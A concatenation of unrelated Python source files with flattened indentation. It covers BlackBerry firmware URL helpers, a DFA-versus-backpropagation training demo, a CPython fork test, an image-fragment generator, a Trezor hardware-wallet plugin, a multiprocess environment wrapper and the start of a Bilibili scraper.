filterdict = {5: ("qc8960.factory_sfi", "qc8960.factory_sfi_hybrid_qc8x30"), 6: ("qc8974.factory_sfi", "qc8960.factory_sfi_hybrid_qc8974")}
osurl = filter_osversion(osurl, device, filterdict)
return osurl
def pop_stl1(osurls, radiourls, splitos):
"""
Replace STL100-1 links in 10.3.3+.
:param osurls: List of OS platforms.
:type osurls: list(str)
:param radiourls: List of radio platforms.
:type radiourls: list(str)
:param splitos: OS version, split and cast to int: [10, 3, 3, 2205]
:type splitos: list(int)
"""
if newer_103(splitos, 3):
osurls = osurls[1:]
radiourls = radiourls[1:]
return osurls, radiourls
def filter_osversion(osurl, device, filterdict):
"""
Modify URLs based on device index and dictionary of changes.
:param osurl: OS URL to modify.
:type osurl: str
:param device: Device to use.
:type device: int
:param filterdict: Dictionary of changes: {device : (before, after)}
:type filterdict: dict(int:(str, str))
"""
if device in filterdict.keys():
osurl = osurl.replace(filterdict[device][0], filterdict[device][1])
return osurl
def generate_lazy_urls(softwareversion, osversion, radioversion, device):
"""
Generate a pair of OS/radio URLs based on input.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param osversion: OS version.
:type osversion: str
:param radioversion: Radio version.
:type radioversion: str
:param device: Device to use.
:type device: int
"""
splitos = [int(i) for i in osversion.split(".")]
rads = ["m5730", "qc8960", "qc8960.omadm", "qc8960.wtr",
"qc8960.wtr5", "qc8930.wtr4", "qc8974.wtr2"]
oses = ["winchester.factory", "qc8960.factory", "qc8960.verizon",
"qc8974.factory"]
maps = {0:0, 1:1, 2:2, 3:1, 4:1, 5:1, 6:3}
osurl = create_bar_url(softwareversion, "{0}_sfi.desktop".format(oses[maps[device]]), osversion)
radiourl = create_bar_url(softwareversion, rads[device], radioversion)
osurl = filter_1031(osurl, splitos, device)
return osurl, radiourl
def bulk_urls(softwareversion, osversion, radioversion, core=False, altsw=None):
"""
Generate all URLs, plus extra Verizon URLs.
:param softwareversion: Software version to hash.
:type softwareversion: str
:param osversion: OS version.
:type osversion: str
:param radioversion: Radio version.
:type radioversion: str
:param device: Device to use.
:type device: int
:param core: Whether or not to return core URLs as well.
:type core: bool
:param altsw: Radio software release, if not the same as OS.
:type altsw: str
"""
baseurl = create_base_url(softwareversion)
osurls, radurls, coreurls = generate_urls(softwareversion, osversion, radioversion, core)
vzwos, vzwrad = generate_lazy_urls(softwareversion, osversion, radioversion, 2)
osurls.append(vzwos)
radurls.append(vzwrad)
vzwcore = vzwos.replace("sfi.desktop", "sfi")
if core:
coreurls.append(vzwcore)
osurls = list(set(osurls)) # pop duplicates
radurls = list(set(radurls))
if core:
coreurls = list(set(coreurls))
radurls = bulk_urls_altsw(radurls, baseurl, altsw)
return osurls, coreurls, radurls
def bulk_urls_altsw(radurls, baseurl, altsw=None):
"""
Handle alternate software release for radio.
:param radurls: List of radio URLs.
:type radurls: list(str)
:param baseurl: Base URL (from http to hashed SW release).
:type baseurl: str
:param altsw: Radio software release, if not the same as OS.
:type altsw: str
"""
if altsw is not None:
altbase = create_base_url(altsw)
radiourls2 = [rad.replace(baseurl, altbase) for rad in radurls]
radurls = radiourls2
del radiourls2
return radurls
def line_begin():
"""
Go to beginning of line, to overwrite whatever's there.
"""
sys.stdout.write("\r")
sys.stdout.flush()
def spinner_clear():
"""
Get rid of any spinner residue left in stdout.
"""
sys.stdout.write("\b \b")
sys.stdout.flush()
class Spinner(object):
"""
A basic spinner using itertools. No need for progress.
"""
def __init__(self):
"""
Generate the itertools wheel.
"""
self.wheel = itertools.cycle(['-', '/', '|', '\\'])
self.file = dummy.UselessStdout()
def after(self):
"""
Iterate over itertools.cycle, write to file.
"""
try:
self.file.write(next(self.wheel))
self.file.flush()
self.file.write("\b\r")
self.file.flush()
except (KeyboardInterrupt, SystemExit):
self.stop()
def stop(self):
"""
Kill output.
"""
self.file = dummy.UselessStdout()
class SpinManager(object):
"""
Wraps around the itertools spinner, runs it in another thread.
"""
def __init__(self):
"""
Start the spinner thread.
"""
spinner = Spinner()
self.spinner = spinner
self.thread = threading.Thread(target=self.loop, args=())
self.thread.daemon = True
self.scanning = False
self.spinner.file = dummy.UselessStdout()
def start(self):
"""
Begin the spinner.
"""
self.spinner.file = sys.stderr
self.scanning = True
self.thread.start()
def loop(self):
"""
Spin if scanning, clean up if not.
"""
while self.scanning:
time.sleep(0.5)
try:
line_begin()
self.spinner.after()
except (KeyboardInterrupt, SystemExit):
self.scanning = False
self.stop()
def stop(self):
"""
Stop the spinner.
"""
self.spinner.stop()
self.scanning = False
spinner_clear()
line_begin()
if not is_windows():
print("\n")
def return_and_delete(target):
"""
Read text file, then delete it. Return contents.
:param target: Text file to read.
:type target: str
"""
with open(target, "r") as thefile:
content = thefile.read()
os.remove(target)
return content
def verify_loader_integrity(loaderfile):
"""
Test for created loader integrity. Windows-only.
:param loaderfile: Path to loader.
:type loaderfile: str
"""
if not is_windows():
pass
else:
excode = None
try:
with open(os.devnull, 'rb') as dnull:
cmd = "{0} fileinfo".format(loaderfile)
excode = subprocess.call(cmd, stdout=dnull, stderr=subprocess.STDOUT)
except OSError:
excode = -1
return excode == 0 # 0 if OK, non-zero if something broke
def bulkfilter_printer(afile):
"""
Print filename and verify a loader file.
:param afile: Path to file.
:type afile: str
"""
print("TESTING: {0}".format(os.path.basename(afile)))
if not verify_loader_integrity(afile):
return os.path.basename(afile)
def bulkfilter(files):
"""
Verify all loader files in a given list.
:param files: List of files.
:type files: list(str)
"""
brokens = [bulkfilter_printer(file) for file in files if prepends(os.path.basename(file), bbconstants.PREFIXES, ".exe")]
return brokens
def verify_bulk_loaders(ldir):
"""
Run :func:`verify_loader_integrity` for all files in a dir.
:param ldir: Directory to use.
:type ldir: str
"""
if not is_windows():
pass
else:
files = verify_bulk_loaders_filefilter(ldir)
brokens = verify_bulk_loaders_brokens(files)
return brokens
def verify_bulk_loaders_filefilter(ldir):
"""
Prepare file names for :func:`verify_bulk_loaders`.
:param ldir: Directory to use.
:type ldir: str
"""
files = [os.path.join(ldir, file) for file in os.listdir(ldir) if not os.path.isdir(file)]
return files
def verify_bulk_loaders_brokens(files):
"""
Prepare filtered file list for :func:`verify_bulk_loaders`.
:param files: List of files.
:type files: list(str)
"""
brokens = [file for file in bulkfilter(files) if file]
return brokens
def list_workers(input_data, workerlimit):
"""
Count number of threads, either length of iterable or provided limit.
:param input_data: Input data, some iterable.
:type input_data: list
:param workerlimit: Maximum number of workers.
:type workerlimit: int
"""
runners = len(input_data) if len(input_data) < workerlimit else workerlimit
return runners
def cpu_workers(input_data):
"""
Count number of CPU workers, smaller of number of threads and length of data.
:param input_data: Input data, some iterable.
:type input_data: list
"""
return list_workers(input_data, compat.enum_cpus())
def prep_logfile():
"""
Prepare log file, labeling it with current date. Select folder based on frozen status.
"""
logfile = "{0}.txt".format(time.strftime("%Y_%m_%d_%H%M%S"))
basefolder = prep_logfile_folder()
record = os.path.join(basefolder, logfile)
open(record, "w").close()
return record
def prep_logfile_folder():
"""
Prepare folder to write log file to.
"""
if getattr(sys, 'frozen', False):
basefolder = os.path.join(os.getcwd(), "lookuplogs")
os.makedirs(basefolder, exist_ok=True)
else:
basefolder = iniconfig.config_homepath(None, True)
return basefolder
def prepends(file, pre, suf):
"""
Check if filename starts with/ends with stuff.
:param file: File to check.
:type file: str
:param pre: Prefix(es) to check.
:type pre: str or list or tuple
:param suf: Suffix(es) to check.
:type suf: str or list or tuple
"""
return file.startswith(pre) and file.endswith(suf)
def lprint(iterable):
"""
A oneliner for 'for item in x: print item'.
:param iterable: Iterable to print.
:type iterable: list/tuple
"""
for item in iterable:
print(item)
def cappath_config_loader(homepath=None):
"""
Read a ConfigParser file to get cap preferences.
:param homepath: Folder containing ini file. Default is user directory.
:type homepath: str
"""
capini = iniconfig.generic_loader('cappath', homepath)
cappath = capini.get('path', fallback=bbconstants.CAP.location)
return cappath
def cappath_config_writer(cappath=None, homepath=None):
"""
Write a ConfigParser file to store cap preferences.
:param cappath: Method to use.
:type cappath: str
:param homepath: Folder containing ini file. Default is user directory.
:type homepath: str
"""
cappath = grab_cap() if cappath is None else cappath
results = {"path": cappath}
iniconfig.generic_writer("cappath", results, homepath)
def one_and_none(first, second):
"""
Check if one element in a pair is None and one isn't.
:param first: To return True, this must be None.
:type first: str
:param second: To return True, this mustbe false.
:type second: str
"""
sentinel = True if first is None and second is not None else False
return sentinel
def def_args(dirs):
"""
Return prepared argument list for most instances of :func:`cond_check:`.
:param dirs: List of directories.
:type dirs: list(str)
"""
return [dirs[4], dirs[5], dirs[2], dirs[3]]
def cond_do(dofunc, goargs, restargs=None, condition=True):
"""
Do a function, check a condition, then do same function but swap first argument.
:param dofunc: Function to do.
:type dofunc: function
:param goargs: List of variable arguments.
:type goargs: list(str)
:param restargs: Rest of arguments, which are constant.
:type restargs: list(str)
:param condition: Condition to check in order to use secondarg.
:type condition: bool
"""
restargs = [] if restargs is None else restargs
dofunc(goargs[0], *restargs)
if condition:
dofunc(goargs[1], *restargs)
def cond_check(dofunc, goargs, restargs=None, condition=True, checkif=True, checkifnot=True):
"""
Do :func:`cond_do` based on a condition, then do it again based on a second condition.
:param dofunc: Function to do.
:type dofunc: function
:param goargs: List of variable arguments.
:type goargs: list(str)
:param restargs: Rest of arguments, which are constant.
:type restargs: list(str)
:param condition: Condition to check in order to use secondarg.
:type condition: bool
:param checkif: Do :func:`cond_do` if this is True.
:type checkif: bool
:param checkifnot: Do :func:`cond_do` if this is False.
:type checkifnot: bool
"""
if checkif:
cond_do(dofunc, goargs[0:2], restargs, condition)
if not checkifnot:
cond_do(dofunc, goargs[2:4], restargs, condition)
|
04_demo_newtork.py
|
from multiprocessing import freeze_support
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
import scipy.interpolate
import scipy.ndimage.filters
import threading
import dataset.cifar10_dataset
from network import activation
from network.layers.conv_to_fully_connected import ConvToFullyConnected
from network.layers.fully_connected import FullyConnected
from network.model import Model
from network.optimizer import GDMomentumOptimizer
if __name__ == '__main__':
"""
Goal: Compare DFA and BP training performances with respect to validation/test loss, validation/test accuracy and
training time on a fully connected NN
Initial learning rate, regularization and learning rate decay parameters were evaluated
by hand by comparing the training performance on the validation set for various
parameter combinations
"""
freeze_support()
num_iteration = 10
data = dataset.cifar10_dataset.load()
""" DFA Model definition """
layers_dfa = [
ConvToFullyConnected(),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=10, activation=None, last_layer=True)
]
model_dfa = Model(
layers=layers_dfa,
num_classes=10,
optimizer=GDMomentumOptimizer(lr=3*1e-3, mu=0.9),
regularization=0.09,
lr_decay=0.5,
lr_decay_interval=3
)
""" BP Model definition """
layers_bp = [
ConvToFullyConnected(),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=500, activation=activation.tanh),
FullyConnected(size=10, activation=None, last_layer=True)
]
model_bp = Model(
layers=layers_bp,
num_classes=10,
optimizer=GDMomentumOptimizer(lr=1e-2, mu=0.9),
regularization=0.01,
lr_decay=0.5,
lr_decay_interval=3
)
print("\nRun training:\n------------------------------------")
class Trainer(object):
def __init__(self, model, method) -> None:
super().__init__()
self.model = model
self.method = method
def __call__(self):
self.model.train(data_set=data, method=self.method, num_passes=num_iteration, batch_size=64)
# stats_dfa = model_dfa.train(data_set=data, method='dfa', num_passes=num_iteration, batch_size=64)
# stats_bp = model_bp.train(data_set=data, method='bp', num_passes=num_iteration, batch_size=64)
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
def animate(i):
ax1.clear()
ax1.plot(np.arange(len(model_dfa.statistics['train_loss'])), model_dfa.statistics['train_loss'])
ax1.plot(np.arange(len(model_bp.statistics['train_loss'])), model_bp.statistics['train_loss'])
dfa_train_thread = threading.Thread(target=Trainer(model_dfa, 'dfa'))
bp_train_thread = threading.Thread(target=Trainer(model_bp, 'bp'))
dfa_train_thread.start()
bp_train_thread.start()
ani = animation.FuncAnimation(fig, animate, interval=1000)
plt.show()
dfa_train_thread.join()
bp_train_thread.join()
loss, accuracy = model_dfa.cost(*data.test_set())
print("\nResult DFA:\n------------------------------------")
print('loss on test set: {}'.format(loss))
print('accuracy on test set: {}'.format(accuracy))
loss, accuracy = model_bp.cost(*data.test_set())
print("\nResult BP:\n------------------------------------")
print('loss on test set: {}'.format(loss))
print('accuracy on test set: {}'.format(accuracy))
|
test_fork1.py
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import time
from test.fork_wait import ForkWait
from test.support import (run_unittest, reap_children, get_attribute,
import_module, verbose)
threading = import_module('threading')
# Skip test if fork does not exist.
get_attribute(os, 'fork')
class ForkTest(ForkWait):
def wait_impl(self, cpid):
for i in range(10):
# waitpid() shouldn't hang, but some of the buildbots seem to hang
# in the forking tests. This is an attempt to fix the problem.
spid, status = os.waitpid(cpid, os.WNOHANG)
if spid == cpid:
break
time.sleep(1.0)
self.assertEqual(spid, cpid)
self.assertEqual(status, 0, "cause = %d, exit = %d" % (status&0xff, status>>8))
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(0)
else:
if verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(0)
self.wait_impl(pid)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def test_main():
run_unittest(ForkTest)
reap_children()
if __name__ == "__main__":
test_main()
|
data_generator.py
|
import os
import cv2
import numpy as np
import random
import threading, queue
import argparse
from tqdm import tqdm
from fragment_generator import generate_fragment, positive_trait, negative_trait
DIMENSION_X, DIMENSION_Y = 224, 224
# write images asynchronously to disk to unblock computation
to_write = queue.Queue(maxsize=10000)
def writer():
"""
Writer for the writer thread that saves generated fragments to disk
"""
# Call to_write.get() until it returns None
for write_task in iter(to_write.get, None):
dirname = os.path.dirname(write_task[0])
os.makedirs(dirname, exist_ok=True)
success = cv2.imwrite(write_task[0], write_task[1])
if not success:
raise RuntimeError(f"Could not save generated sample to {write_task[0]}")
def write_fragments(trait_generator, amount, path):
"""
Generates fragments with the traits given by the given trait generator and saves them to the given path
"""
# existing_files = [os.path.join(root, name)
# for root, dirs, files in os.walk(path)
# for name in files if name.endswith(IMAGE_FORMATS)]
existing_files = []
for i in tqdm(range(len(existing_files), amount), total=amount - len(existing_files), ascii=True):
traits = trait_generator()
fragment = generate_fragment(traits, (DIMENSION_X, DIMENSION_Y))
file_path = path + "/{}.png".format(i)
write_task = (file_path, fragment)
to_write.put(write_task)
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--positive", default=100, type=int,
help="Amount of positive fragments that should be generated (default is 100).")
ap.add_argument("-n", "--negative", default=100, type=int,
help="Amount of negative fragments that should be generated (default is 100)/")
ap.add_argument("-pp", "--pospath", default="./generated/positive",
help="Path to which positive fragments will be saved.")
ap.add_argument("-np", "--negpath", default="./generated/negative",
help="Path to which negative fragments will be saved.")
args = vars(ap.parse_args())
positive_path = args['pospath']
negative_path = args['negpath']
positive_amount = args['positive']
negative_amount = args['negative']
# start the writer for the fragments
threading.Thread(target=writer).start()
write_fragments(positive_trait, positive_amount, positive_path)
write_fragments(negative_trait, negative_amount, negative_path)
print("Generation is done, waiting for writing...")
# enqueue None to instruct the writer thread to exit
to_write.put(None)
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from commerciumelectro.util import bfh, bh2u
from commerciumelectro.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from commerciumelectro.i18n import _
from commerciumelectro.plugins import BasePlugin
from commerciumelectro.transaction import deserialize
from commerciumelectro.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey('standard', bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def commerciumelectro_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.commerciumelectro_tx_to_txtype(tx)
|
msg_multiproc.py
|
import numpy as np
from multiprocessing import Pipe, Process
from . import Env
# LISTEN only needed for Windows, potentially MacOS, since SC2 on linux is headless
START, STEP, LISTEN, RESET, STOP, DONE = range(6)
class MsgProcEnv(Env):
def __init__(self, env):
super().__init__(env.id)
self._env = env
self.conn = self.w_conn = self.proc = None
def start(self):
self.conn, self.w_conn = Pipe()
self.proc = Process(target=self._run)
self.proc.start()
self.conn.send((START, None))
def step(self, act):
self.conn.send((STEP, act))
def listen(self):
self.conn.send((LISTEN, None))
def reset(self):
self.conn.send((RESET, None))
def stop(self):
self.conn.send((STOP, None))
def wait(self):
return self.conn.recv()
def obs_spec(self):
return self._env.obs_spec()
def act_spec(self):
return self._env.act_spec()
def _run(self):
while True:
msg, data = self.w_conn.recv()
if msg == START:
self._env.start()
self.w_conn.send(DONE)
elif msg == STEP:
obs, rew, done = self._env.step(data)
self.w_conn.send((obs, rew, done))
elif msg == LISTEN:
received_msg = self._env.listen_to_chat_channel()
self.w_conn.send((received_msg))
elif msg == RESET:
obs = self._env.reset()
self.w_conn.send((obs, -1, -1))
elif msg == STOP:
self._env.stop()
self.w_conn.close()
break
class MsgMultiProcEnv(Env):
"""
Parallel environments via multiprocessing + pipes
"""
def __init__(self, envs):
super().__init__(envs[0].id)
self.envs = [MsgProcEnv(env) for env in envs]
def start(self):
for env in self.envs:
env.start()
self.wait()
def step(self, actions):
for idx, env in enumerate(self.envs):
env.step([a[idx] for a in actions])
return self._observe()
def listen(self):
for idx, env in enumerate(self.envs):
env.listen()
# only collect the non-empty messages
received_message = [message for message in self.wait() if message]
# TODO add in a better logic for filtering useless message
# only return the latest
if len(received_message) > 0:
return received_message[0]
def reset(self):
for e in self.envs:
e.reset()
return self._observe()
def _observe(self):
obs, reward, done = zip(*self.wait())
# n_envs x n_spaces -> n_spaces x n_envs
obs = list(map(np.array, zip(*obs)))
return obs, np.array(reward), np.array(done)
def stop(self):
for e in self.envs:
e.stop()
for e in self.envs:
e.proc.join()
def wait(self):
return [e.wait() for e in self.envs]
def obs_spec(self):
return self.envs[0].obs_spec()
def act_spec(self):
return self.envs[0].act_spec()
|
bili_relation.py
|
import os
import time
import json
import redis
import requests
import signal
import random
from multiprocessing import Process, Pool
from bos_filter import RedisDB, BosFilter
from bili_mongo import BosMongo
rdb = RedisDB()
mbd = BosMongo()
bf = BosFilter()
r = redis.Redis(host="127.0.0.1")
redis_key = "bili_relation_list"
redis_set = "bili_relation_set"
def parse(pid, url, proxies):
response = requests.get(url, proxies=proxies)
ret_dict = json.loads(response.text)
status_code = ret_dict.get('code')
if not status_code:
if 'data' in ret_dict.keys():
info_dict = ret_dict.get('data')
